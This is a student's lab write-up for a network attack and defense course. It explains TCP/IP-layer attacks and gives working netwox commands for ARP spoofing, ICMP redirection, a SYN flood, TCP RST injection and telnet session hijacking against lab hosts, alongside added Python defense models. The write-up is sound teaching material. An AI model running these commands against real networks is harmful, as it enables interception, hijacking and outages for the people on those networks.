20199320 2019-2020-2 "Network Attack and Defense Practice" Week 5 assignment

This assignment belongs to the course https://edu.cnblogs.com/campus/besti/19attackdefense
The requirements for this assignment are at https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10553
My goal in this course is to master the knowledge and hands-on skills of network attack and defense
This assignment helped me towards that goal in the following respect: understanding the security problems of the TCP/IP protocol stack, the most basic network-layer and transport-layer protocols, and the attack techniques that target them

I. Knowledge summary


1. Overview of attacks on the TCP/IP network protocol stack


  • Network security attributes

    Confidentiality: ensuring that sensitive or secret data is not exposed to unauthorized viewing while in transit or in storage.

    Integrity: ensuring that transmitted, received or stored data is complete and has not been tampered with, and that if tampering does occur, the fact, time and position of the tampering can be detected.

    Availability: ensuring that data and services remain available even under network attack, computer virus infection, system crashes, war damage, natural disasters and other emergencies.

    Authenticity: the ability to verify that an entity (a person, process or system), its identity information and the source of information are genuine.

    Non-repudiation: ensuring that the operator or processor of an information system cannot deny its actions or the results of its processing.

  • The basic model of network attacks

    • Passive threats

      Interception (against confidentiality); specific attack techniques: sniffing and eavesdropping

    • Active threats

      Tampering (against integrity); specific attack techniques: packet tampering and identity spoofing, generally carried out together with a man-in-the-middle attack

      Interruption (against availability); specific attack technique: denial of service

      Forgery (against authenticity); specific attack technique: spoofing

  • Security flaws of the TCP/IP network protocol stack and the corresponding attack techniques (summarized in a figure in the original post)

  • Raw packet forgery techniques and tools

    • Using a raw socket (RawSocket) bypasses the TCP/IP stack's packet encapsulation and checking, so arbitrary packets can be constructed, such as the forged packets used in various spoofing attacks.
    • Very powerful and easy-to-use open source toolkits: Netwox, and Netwag (a friendly GUI front end)

2. Network layer protocol attacks


2.1 IP source address spoofing


  • The root cause that makes IP source address spoofing possible: the IP protocol routes and forwards packets using only the destination address; it does not verify the authenticity of the source address.
  • IP source address spoofing process: (figure in the original post)

2.2 ARP spoofing


  • How the ARP protocol maps an IP address to a MAC address:

    • When a host needs to send a packet to a destination host, it first checks whether its own ARP cache holds the MAC address corresponding to the destination IP address. If so, the packet is sent directly to that MAC address; if not, it broadcasts an ARP request packet on the local LAN segment, asking for the MAC address corresponding to the destination IP address.
    • All hosts on the local LAN segment receive the ARP request and check whether the requested IP address is their own. The host whose address matches updates its ARP cache with the source IP and MAC address and sends an ARP reply packet back to the source host; hosts that do not match ignore the request.
    • The source host writes the IP and MAC address from the reply packet into its own ARP cache table and starts transmitting data packets.
  • ARP spoofing attack principle: the source host broadcasts a request on the local LAN segment to obtain the destination host's MAC address, and there is no mechanism for authenticating the reply packet sent back to it; ARP spoofing stems from this.

  • ARP spoofing process: (figure in the original post)

  • Tools: the Arpspoof tool in the DSniff suite, arpoison, Ettercap, and the Netwox tool set.

    netwox 33 -b MAC(A) -g IP(B) -h MAC(A) -i IP(A): spoof A so that A receives the IP(B)/MAC(C) mapping.


2.3 Routing redirection attack


  • Principle of the ICMP redirect routing mechanism: when the network topology changes or a network failure occurs and a host is sending data along a non-optimal route, a router uses an ICMP redirect packet to make the host update its routing table, so that the host selects a better transmission route.

  • ICMP redirect routing attack process:

    • The attacking node uses IP source address spoofing to pose as the gateway and send ICMP redirect messages.

    • The attacked node is made to select the attacking node as its new route.

    • The attacking node acts as a man in the middle and eavesdrops throughout.

    • Using the redirection mechanism, the malicious node sends the attacked node another ICMP redirect packet specifying the better path, i.e. the original correct route. (figure in the original post)

  • ICMP route redirection attack technique: netwox 86 -f "host <target IP>" -g <attacker IP> -i <gateway IP>. When a packet whose source or destination IP matches the filter is sniffed, an ICMP redirect is sent on behalf of the gateway IP to the packet's source address (the target), so that the target uses the attacker IP as its default route.


3. Transport layer attacks


3.1 TCP RST attack


  • TCP RST attack principle: when the "reset" flag bit in the TCP header is set to 1, the TCP session is disconnected.

  • TCP RST attack process:

    • Attacker C obtains the IP addresses, ports and sequence numbers of the two communicating parties A and B by sniffing.

    • Using IP source address spoofing, C disguises itself as host A and sends a TCP reset packet to B, interrupting the communication between the two. (figure in the original post)

  • netwox attack: netwox 78 -i <target IP>


3.2 TCP session hijacking attack


  • TCP session hijacking principle: after the two sides have established a TCP session, the attacker hijacks it, thereby avoiding the need to authenticate.

  • TCP session hijacking process:

    • The target connects to the server.

    • The server sends the target a response packet (containing SVR_SEQ) and the next sequence number it expects from the target (SVR_ACK).

    • The attacker uses ARP spoofing to impersonate the target and send packets to the server.

    • The attacker sends the target a TCP reset to tear down the connection between the target and the server, so that the network administrator does not discover the attack. (figure in the original post)


3.3 TCP SYN Flood denial-of-service attack



II. Practice


1. ARP spoofing

  • Host      Role                    IP               MAC
    Win2K     target A, FTP server    192.168.200.124  00:0c:29:c5:fb:24
    seed      target B, FTP client    192.168.200.6    00:0c:29:7e:a4:9f
    kali      attacker C              192.168.200.4    00:0c:29:ss:8He:four
  • From the attacker, ping the two targets, then run arp -a to view the MAC addresses of the two hosts (screenshot in the original post).

  • Use the command netwox 33 -b MAC(A) -g IP(B) -h MAC(A) -i IP(A) to ARP-spoof host A, so that A receives the IP(B)/MAC(C) mapping.

    • In netwox, use tool 5 to enter a node (command-line work), then tool 33 (construct an Ethernet/ARP packet).

    • Enter the command netwox 33 -b 00:0c:29:c5:fb:24 -g 192.168.200.6 -h 00:0c:29:c5:fb:24 -i 192.168.200.124

    • On target A, run arp -a to view the ARP table; it has been changed successfully.

  • Use the command netwox 33 -b MAC(B) -g IP(A) -h MAC(B) -i IP(B) to ARP-spoof host B, so that B receives the IP(A)/MAC(C) mapping.

    • Enter the command netwox 33 -b 00:0c:29:7e:a4:9f -g 192.168.200.124 -h 00:0c:29:7e:a4:9f -i 192.168.200.6

    • On target B, run arp -a to view the ARP table; it has been changed successfully.

  • Host B uses the command ftp 192.168.200.124 to access the FTP service on A, while the attacker captures with wireshark. The attacker captures the communication between targets A and B (screenshots in the original post).
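The two netwox 33 commands above leave a single MAC (the attacker's) claiming both IP(A) and IP(B), and each target's cache entry for the other host changes. The detector below is an added example written for this page, not code from the post or from netwox: it shows how a passive listener on the segment (or a check against static entries pinned with arp -s) would flag both signals. The reply log is constructed from the table above and the attacker's MAC is a placeholder.

```python
from collections import defaultdict

# Constructed ARP reply log, as a passive listener on the 192.168.200.0/24
# segment might record it: (seconds, sender IP, sender MAC). A and B use the
# MACs from the table above; the attacker's MAC is a constructed placeholder.
ARP_REPLIES = [
    (0.0, "192.168.200.124", "00:0c:29:c5:fb:24"),  # A answers for itself
    (0.1, "192.168.200.6",   "00:0c:29:7e:a4:9f"),  # B answers for itself
    (5.0, "192.168.200.6",   "00:0c:29:aa:bb:cc"),  # forged IP(B) -> MAC(C), aimed at A
    (5.2, "192.168.200.124", "00:0c:29:aa:bb:cc"),  # forged IP(A) -> MAC(C), aimed at B
]

def detect_arp_spoofing(replies, trusted=None):
    """Return (alerts, mitm_macs).

    alerts    : findings in time order
    mitm_macs : MACs that claimed more than one IP, the wire-level signature
                of one host inserting itself between two others
    trusted   : optional {ip: mac} table of static entries (what arp -s on the
                targets would pin); replies that contradict it are flagged
    """
    trusted = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    last_seen = dict(trusted)          # most recent MAC claimed for each IP
    claimed = defaultdict(set)         # IPs claimed by each MAC
    alerts, mitm_macs = [], set()
    for t, ip, mac in replies:
        mac = mac.lower()
        if ip in trusted and trusted[ip] != mac:
            alerts.append(f"t={t:.1f}: {ip} claimed by {mac}, static entry says {trusted[ip]}")
        elif ip in last_seen and last_seen[ip] != mac:
            alerts.append(f"t={t:.1f}: {ip} moved from {last_seen[ip]} to {mac}")
        last_seen[ip] = mac
        claimed[mac].add(ip)
        if len(claimed[mac]) > 1:
            mitm_macs.add(mac)
            alerts.append(f"t={t:.1f}: {mac} now claims {sorted(claimed[mac])}")
    return alerts, mitm_macs

if __name__ == "__main__":
    for line in detect_arp_spoofing(ARP_REPLIES)[0]:
        print(line)
```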


2. ICMP route redirection attack

  • Host            Role       IP
    kali            attacker   192.168.200.4
    winXPattacker   target     192.168.200.2
    router                     192.168.200.1
  • Display the target's routing table (screenshot in the original post).

  • netwox 86 -f "host <target IP>" -g <attacker IP> -i <gateway IP>: when a packet whose source or destination IP matches the filter is sniffed, an ICMP redirect packet is sent in the name of the gateway to the packet's source address (the target), so that the target uses the attacker IP as its default route.

    • On the attacker, enter netwox 86 -f "host 192.168.200.2" -g 192.168.200.4 -i 192.168.200.1 to enter the listening state. Have the target visit any web page, then query the routing information again: two extra routes via the attacker's IP appear (screenshot in the original post).
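Why the XP target installed the attacker's routes, and what a host can do about it, as an added example that is not code from the post or from netwox: this Python model applies the RFC 1122 redirect rules plus the behaviour of the Linux net.ipv4.conf.*.accept_redirects and secure_redirects sysctls, as I understand them, to the lab's redirect. The host and redirect values come from the table above; the sysctl semantics are a simplified model, not kernel code.

```python
import ipaddress

# Constructed view of the lab target (winXPattacker, 192.168.200.2/24) and of
# the redirect netwox 86 sends it with the gateway's address as source.
LAB_HOST = {
    "ifaddr": "192.168.200.2/24",
    "default_gws": ["192.168.200.1"],
    "current_gw": "192.168.200.1",   # next hop the host currently uses
}
LAB_REDIRECT = {"src": "192.168.200.1", "new_gw": "192.168.200.4"}

def accept_icmp_redirect(redirect, host, accept_redirects=True, secure_redirects=True):
    """Decide whether a host should honour an ICMP redirect.

    Models the RFC 1122 checks and the Linux accept_redirects / secure_redirects
    sysctls (a simplification written for this page). Returns (accepted, reason).
    """
    if not accept_redirects:
        return False, "accept_redirects=0: redirect ignored"
    src = ipaddress.ip_address(redirect["src"])
    new_gw = ipaddress.ip_address(redirect["new_gw"])
    link = ipaddress.ip_interface(host["ifaddr"]).network
    # RFC 1122: only the router currently used for the destination may redirect;
    # the lab attack passes this check because it spoofs the gateway's address.
    if src != ipaddress.ip_address(host["current_gw"]):
        return False, "sender is not the gateway currently used for this destination"
    # RFC 1122: the new first hop must be on the directly connected network
    if new_gw not in link:
        return False, "new gateway is not on the directly connected network"
    # secure_redirects: additionally require the new hop to be a known default gateway
    if secure_redirects and str(new_gw) not in host["default_gws"]:
        return False, "secure_redirects=1: new gateway is not a configured default gateway"
    return True, f"host route for the destination now points at {new_gw}"
```

A permissive host (secure_redirects off, as the XP target behaved) accepts the lab redirect; a Linux host with the defaults rejects it, and setting accept_redirects=0 rejects redirects outright.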


3. SYN Flood attack

  • Host        Role       IP
    kali        attacker   192.168.200.4
    seeubuntu   target     192.168.200.6
  • Before the attack, connect to the target with telnet; the connection succeeds (screenshot in the original post).

  • On the attacker, enter netwox 76 -i "192.168.200.6" -p 23 to launch a SYN Flood against port 23 of the target. Capture with wireshark and a large number of SYN packets are found (screenshot in the original post).

  • After about five minutes of attack I ran telnet again, and it still connected; maybe the seed target has enough memory to withstand this kind of attack? Then I tried attacking port 80 of the winXPattacker target, and my machine froze; I had to force-quit kali, which had less than 60 G of disk space. Well, this attack cannot be used casually.
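The standard defence against a SYN flood of the kind launched with netwox 76 is SYN cookies, which let a server answer every SYN without keeping half-open connection state; Linux enables them through net.ipv4.tcp_syncookies. Below is an added, simplified implementation written for this page (not code from the post, netwox or the kernel): the server's ISN is a keyed hash of the 4-tuple and a coarse timestamp with the client's MSS folded into the low bits, and the final ACK is validated by recomputing it. The secrets, MSS table, addresses and ports are constructed.

```python
import hashlib, hmac, struct

SECRET1 = b"constructed-secret-1"    # constructed; a real host draws these at boot
SECRET2 = b"constructed-secret-2"
COOKIEBITS, MAX_AGE = 24, 2          # 8-bit time counter; accept cookies up to 2 ticks old
COOKIEMASK = (1 << COOKIEBITS) - 1
MSS_TABLE = [536, 1300, 1440, 1460]  # the only MSS values a cookie can encode

def _h(secret, *fields):
    """32-bit keyed hash over addresses (str) and integers (ports, counter)."""
    raw = b"".join(f.encode() if isinstance(f, str) else struct.pack("!I", f) for f in fields)
    return int.from_bytes(hmac.new(secret, raw, hashlib.sha256).digest()[:4], "big")

def _mss_index(mss):
    return max([0] + [i for i, v in enumerate(MSS_TABLE) if v <= mss])

def make_cookie(saddr, daddr, sport, dport, sseq, count, mss):
    """Server ISN for an incoming SYN (client ISN sseq, time tick count).
    Nothing is stored: the SYN queue cannot be exhausted by a flood."""
    h1 = _h(SECRET1, saddr, daddr, sport, dport)
    h2 = _h(SECRET2, saddr, daddr, sport, dport, count)
    return (h1 + sseq + (count << COOKIEBITS) + ((h2 + _mss_index(mss)) & COOKIEMASK)) & 0xffffffff

def check_cookie(saddr, daddr, sport, dport, sseq, cookie, count):
    """Return the MSS encoded in a valid cookie, or None if forged or stale."""
    h1 = _h(SECRET1, saddr, daddr, sport, dport)
    base = (cookie - h1 - sseq) & 0xffffffff
    age = (count - (base >> COOKIEBITS)) & 0xff
    if age >= MAX_AGE:
        return None
    issued = count - age
    h2 = _h(SECRET2, saddr, daddr, sport, dport, issued)
    idx = (base - (issued << COOKIEBITS) - h2) & COOKIEMASK
    return MSS_TABLE[idx] if idx < len(MSS_TABLE) else None

def handle_ack(saddr, daddr, sport, dport, seq, ack, count):
    """Third handshake packet: client seq is its ISN+1, ack is our cookie+1.
    Returns the connection state to create, or None to drop the ACK."""
    mss = check_cookie(saddr, daddr, sport, dport,
                       (seq - 1) & 0xffffffff, (ack - 1) & 0xffffffff, count)
    return None if mss is None else {"mss": mss, "rcv_nxt": seq, "snd_nxt": ack}
```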


4. TCP RST attack

  • Host        Role       IP
    kali        attacker   192.168.200.4
    seeubuntu   target     192.168.200.6
  • An FTP connection is established between the two sides (screenshot in the original post).

  • On the attacker, use netwox 78 -i 192.168.200.6 to carry out a TCP RST attack on the target, with wireshark capturing on the attacker. The capture shows the attacker sending the target a RST to disconnect it (screenshot in the original post).

  • Trying the ftp connection again afterwards, the connection fails as expected (screenshot in the original post).


5. TCP session hijacking attack

  • Host            Role                IP               MAC
    winXPattacker   target A, client    192.168.200.2    00:0c:29:fa:58:be
    seed            target B, server    192.168.200.6    00:0c:29:7e:a4:9f
    kali            attacker C          192.168.200.4    00:0c:29:ss:8He:four
  • To reinforce my memory I changed target A and used the ARP spoofing from above, netwox 33 -b 00:0c:29:fa:58:be -g 192.168.200.6 -h 00:0c:29:fa:58:be -i 192.168.200.2, to ARP-spoof winXPattacker.

  • Target A logs in to seed by Telnet, and wireshark on the attacker captures the interaction between targets A and B. Find a Telnet packet and expand Transmission Control Protocol to view the source port, destination port, next seq and ack (the server port is fixed at 23, the telnet port; screenshot in the original post).

  • Because we want to forge the next packet, we directly use the captured next seq (725) as the ack of the next packet, and the captured ack (17) as the seq of the next packet.

  • Having obtained this information, the attacker uses netwox to forge a TCP packet from the client to the server. Once it is sent successfully, the original client loses the connection while the server treats the attacker as the client, so the attacker has achieved session hijacking.

    • Format of the packet the attacker sends:

      netwox 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl <client TTL> --ip4-protocol 6 --ip4-src <client IP> --ip4-dst <server IP> --tcp-src <captured destination port> --tcp-dst <captured source port> --tcp-seqnum <captured ack> --tcp-acknum <captured next seq> --tcp-ack --tcp-psh --tcp-window 128 --tcp-data "<data to send>"

    • The attacker enters the command:

      netwox 40 --ip4-dontfrag --ip4-offsetfrag 0 --ip4-ttl 128 --ip4-protocol 6 --ip4-src 192.168.200.2 --ip4-dst 192.168.200.6 --tcp-src 1150 --tcp-dst 23 --tcp-seqnum 17 --tcp-acknum 725 --tcp-ack --tcp-psh --tcp-window 128 --tcp-data "6c"

      Notes:

      • How to get the machine's TTL? Run ping 127.0.0.1 on that machine.

      • The ack and seq of the sent packet were explained above.

      • The "data to send" is the hexadecimal representation of the information carried in the packet; "6c" is the hex I used for "l", which shows up in the contents of the packet captured below.

    • Screenshot of the attacker entering the command (in the original post).

  • Wireshark on the attacker successfully captures the packet the attacker forged from the client to the server (screenshot in the original post).

At this point, the TCP session hijacking attack has succeeded.
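The RST attack in section 4 and the hijack above both work because netwox crafts a segment whose sequence number is exactly what the server expects. The model below is an added example written for this page, not code from the post or from netwox: it replays the page's numbers, seq 17 and ack 725, from the telnet server's point of view, shows why the real client is left out of sync after the injected byte, and applies the RFC 5961 RST rules, under which a sniffed exact sequence number still resets the connection while guessed in-window or out-of-window RSTs are challenged or dropped. The receive window of 128 is a constructed value, and the server's own replies are not modelled.

```python
from dataclasses import dataclass

@dataclass
class Tcb:                      # the receiver's side of one established connection
    rcv_nxt: int                # next sequence number expected from the peer
    rcv_wnd: int                # receive window
    snd_nxt: int                # next sequence number we will send
    state: str = "ESTABLISHED"

def _in_window(tcb, seq):
    return ((seq - tcb.rcv_nxt) & 0xffffffff) < tcb.rcv_wnd

def process_segment(tcb, seq, ack, flags, data=b""):
    """Return the disposition of one inbound segment and update the TCB.

    RST handling follows RFC 5961 section 3.2: reset only if seq == RCV.NXT,
    reply with a challenge ACK if merely in-window, drop otherwise. Data is
    accepted only when it starts exactly at RCV.NXT (no reassembly modelled).
    """
    if tcb.state == "CLOSED":
        return "drop (closed)"
    if "RST" in flags:
        if seq == tcb.rcv_nxt:
            tcb.state = "CLOSED"
            return "reset"
        return "challenge-ack" if _in_window(tcb, seq) else "drop (RST out of window)"
    last = (seq + max(len(data), 1) - 1) & 0xffffffff     # last byte the segment covers
    if not (_in_window(tcb, seq) or _in_window(tcb, last)):
        return f"drop (stale or out of window), ack {tcb.rcv_nxt}"
    if ack > tcb.snd_nxt:                                  # wraparound ignored in this model
        return "drop (acks data we never sent)"
    if seq != tcb.rcv_nxt:
        return f"out of order, ack {tcb.rcv_nxt}"          # a real stack would trim or queue it
    tcb.rcv_nxt = (tcb.rcv_nxt + len(data)) & 0xffffffff
    return "accept"

def lab_scenario():
    """Replay the page's hijack numbers from the telnet server's point of view."""
    srv = Tcb(rcv_nxt=17, rcv_wnd=128, snd_nxt=725)      # window is a constructed value
    return [
        process_segment(srv, 17, 725, {"ACK", "PSH"}, b"l"),   # forged by netwox 40: taken as real
        process_segment(srv, 17, 725, {"ACK", "PSH"}, b"x"),   # real client's next keystroke: now stale
        process_segment(srv, 9000, 725, {"RST"}),              # blind RST, wrong guess
        process_segment(srv, 60, 725, {"RST"}),                # in-window but inexact guess
        process_segment(srv, 18, 725, {"RST"}),                # sniffed exact seq (what netwox 78 sends)
    ]
```

Because a LAN sniffer sees the exact numbers, RFC 5961 does not stop the lab attack; the lasting fixes are to prevent the ARP spoof (static entries, dynamic ARP inspection) and to replace telnet and ftp with SSH or TLS-protected sessions, where an injected byte is rejected by the record authentication.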


III. Problems encountered in learning and their solutions

  • Question 1: kali had no Internet access, and the previous approach did not solve it.

    Solution: switch the network connection mode to bridged mode; at this point I ran ifconfig to check eth0's IP, and after searching Baidu I entered the command dhclient eth0, after which an IP could be found and the machine could get online successfully.

  • Question 2: a Telnet connection clearly succeeded just before, but after ARP spoofing the connection failed!!!

    Solution: switching to a different target gave the same problem. After fretting about it for a while, I tried again and it worked, which made me feel silly!!! Then I quickly opened wireshark on the attacker to capture.

  • Question 3: after the SYN flood attack, the attacker could still connect to the target, which is strange.

    Solution: not yet resolved; my guess is that the target may have enough memory not to be afraid of the attack.


IV. Practice summary

The first thing I want to say is that network attack and defense is really hard: it demands not only strong technical skills but also a clear head. During the practice I constantly had to go back to the principles; when reading the book I felt I understood, but during practice I forgot, or had not grasped them solidly. Having carried out these attacks, I still do not remember the principles and commands clearly, so I need to keep consolidating them, or rather strengthen the knowledge through lots of practice.

Secondly, to sum up this practice: I used the single tool netwox to carry out ARP spoofing, ICMP route redirection, SYN Flood, TCP RST and TCP session hijacking attacks. I will not elaborate on the principle of each attack here (recalling them in my mind......); I should become more familiar with the commands used for each. Of these, the ARP spoofing attack command took me a long time to understand thoroughly, and I think it is easier to remember after practising it.


V. References

Source: www.cnblogs.com/liangxu111/p/12610054.html